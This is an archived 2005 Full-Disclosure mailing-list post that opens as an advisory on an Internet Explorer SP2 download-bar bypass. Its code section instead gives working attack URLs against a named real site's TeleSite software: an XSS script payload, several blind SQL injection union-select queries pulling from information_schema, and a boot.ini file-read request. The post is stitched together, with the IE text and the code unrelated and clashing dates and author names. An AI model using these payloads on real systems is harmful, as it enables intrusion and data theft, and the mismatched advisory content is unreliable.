[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] bug

To: <Full-Disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] bug
From: "sinneR" <rafiware@xxxxxxxxxxxx>
Date: Mon, 14 Nov 2005 17:47:54 +0200

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:       Internet Explorer
Vendors:           http://www.microsoft.com
Versions:          6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With:      SP2;
Platforms:         Windows
Bug:               Remote File Download Information Bar Bypass
Exploitation:      Remote with browser
Date:              13 Jan 2005
Author:            Rafel Ivgi, The-Insider
e-mail:            the_insider@xxxxxxxx
web:               http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Internet Explorer is currently the most common internet browser in the world.
Microsoft Windows XP Service Pack 2 was designed to block any file download
by an information bar which must be clicked and selected with "Download File".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

While trying to download a file Microsoft Internet Explorer
the user gets the information bar. The information bar
mechanism blocks/catches all references to download-able files,
even through javascripts and HTML Event properties.
However Microsoft's Internet Explorer (SP2) DOES NOT CATCH
"body" tag with the HTML "onclick" event which dynamically
created "iframe" tags. For a good, more complicated dynamic
object creation i used the "createElement" function.
This way an attacker can make a user download a file with him just
clicking anywhere on the page (not on an hyperlink).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Articles Menu Access:
-----------------------------------------
        http://www2.golan.org.il/ts.exe?tsurl=0.1.0.0


Cross Site Scripting - XSS:
--------------------------
        
http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EE%EC%E5%EF'%20<script>alert()</script>


Blind SQL Injection
-------------------
        Proof Of Concept:
                
http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EE%EC%E5%EF'%20and%20'1'='2

        Exploitation:
                
http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EE%EC%E5%EF'%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20information_schema.columns--
                
http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%EE%EC%E5%EF'%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,table_name,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20information_schema.columns--
                
http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe','asd','asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--
                
http://www2.golan.org.il/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe','asd','asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--


Local Path Disclosure:
-----------------------
        D:\TeleSite\online\templates\\example\sections\header 


Local File Enumeration:
-----------------------
        http://www2.golan.org.il/ts.cgi?c:\boot.ini
        http://www2.golan.org.il/ts.cgi?c:\boot1.ini


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafi Nahum, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."




walla telesite system vulnerabilities:
****************************************

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Enough's enough...
Next by Date: [Full-disclosure] Walla TeleSite Multiple Vulnerabilities
Previous by thread: [Full-disclosure] [SECURITY] [DSA 894-1] New AbiWord packages fix arbitrary code execution
Next by thread: [Full-disclosure] Walla TeleSite Multiple Vulnerabilities
Index(es):
- Date
- Thread